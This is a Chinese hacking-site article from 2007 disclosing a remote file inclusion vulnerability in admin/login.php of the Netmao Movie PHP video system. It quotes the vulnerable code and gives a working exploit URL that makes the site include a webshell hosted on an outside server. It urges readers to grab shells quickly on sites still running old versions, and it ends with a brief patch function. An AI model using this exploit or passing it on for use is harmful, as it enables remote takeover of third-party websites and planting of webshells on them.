黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 文章正文
[推荐]Netmao Movie网猫电影系统漏洞
        ★★★★★
Netmao Movie网猫电影系统漏洞
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-2-2

IceskYsl在NOHACK上发表的php漏洞专题。第一次就是包含文件漏洞

那今天我就很快找到了一个,不敢独享!呵呵。

程序:Netmao Movie网猫电影系统。

说明下:现在它的最新版本是3.0,由于加密了,所以就不好继续研究。
不过网上使用的很多都不是最新的版本。所以想拿shell的要赶快哦。

漏洞文件:admin目录下的login.php文件。

代码:

if($action=='login'){

    @session_start();
    if($_SESSION['randomstr']!=$checkcode){
      cpmsg('对不起,验证码错误','?file=login');
      exit();
    }

    $referer=$referer?$referer:'?file=';

    $username=addslashes($username);
    $password=addslashes($password);
    $password=MD5($password);

    $result=$db->query("Select * FROM $table_member Where user='$username' AND pwd='$password'");
  if($db->num_rows($result)==1){
      $r=$db->fetch_array($result);
      $_SESSION[username]=$r[$user];
          if($r[priv]=='1'){$_SESSION[admin]='1';}
      cpmsg("登录成功!",$referer);
  }else{
    session_destroy();
    cpmsg("对不起,帐号和密码不匹配!",$referer);
  }

}elseif($action=='logout'){

    session_destroy();
    cpmsg("你已经成功退出!",'?file=login');

}
else
{

    include $A_tpl.'/login.tpl.php';
     
}

我们直奔else语句里的代码。变量A_tpl 没赋值,直接拿来用。
直接输入admin/login.php可以暴出路径。

EXP:

admin/login.php?A_tpl=http://www.xxxx.com/cmd.txt?

在一个不支持php脚本的空间建立一个login.tpl.php(当然是自己的脚本木马咯)
访问admin/login.php?A_tpl=http://www.xxxx.com 即可。


好了,结束。。初来~请各位牛人多多指教。
---------------------------------------------------------------------------------------------------
修补漏洞的方案:

function StopRemoteInclude($InclueName){
          if(strpos($InclueName,'\\')!==false){  
          return substr($InclueName,0,strrpos($InclueName,'\\'));
    }elseif(strpos($InclueName,'/')!==false){
          return substr($InclueName,0,strrpos($InclueName,'/'));
    }else{
          return '/';
    }
}
define('S_Dir',__FILE__?StopRemoteInclude(__FILE__).'/' : './');
-------------------------------------------------------------------------------------------------------------

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    PPPOE验证缺陷所带来的危害03-21
    Ce-Admin新闻发布系统漏洞分析02-07
    Discuz漏洞分析11-28
    入侵检测PHP程序中的目录遍历漏洞10-12
    主流入侵检测产品大比较10-03
    一种新的带宽攻击方式(图)06-16
    Javascript实现评估用户输入密码05-30
    针锋相对:主要的反NIDS技术应用05-22
    dvbbs7.1sp1最新漏洞的研究和利用05-13
    IE mhtml redirection漏洞利用方05-12
    Php后门的隐藏技巧测试报告05-11
    McAfee IntruShield 2600入侵防护05-09
    相 关 文 章
  • dxbbs漏洞(通杀7.3以前所有版本)

  • webshell+serv-u获取系统最高权限

  • Vista+谷歌拼音输入法重现输入法漏洞

  • Fedora Core6中IPtables日志管理技巧

  • Vista营销被指涉嫌欺诈 微软面临集体起

  • 使用感受 Vista系统居然拒绝格式化C盘

  • 在预装Vista的PC上安装XP并设双重启动

  • Vista解惑100点之部署NAP须知的10件事

  • Vista十八项测试不如XP

  • 清理Vista系统垃圾

  • Vista系统解惑100点之服务加固10个事项

  • 利用微软动画光标漏洞的复合型蠕虫现身

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886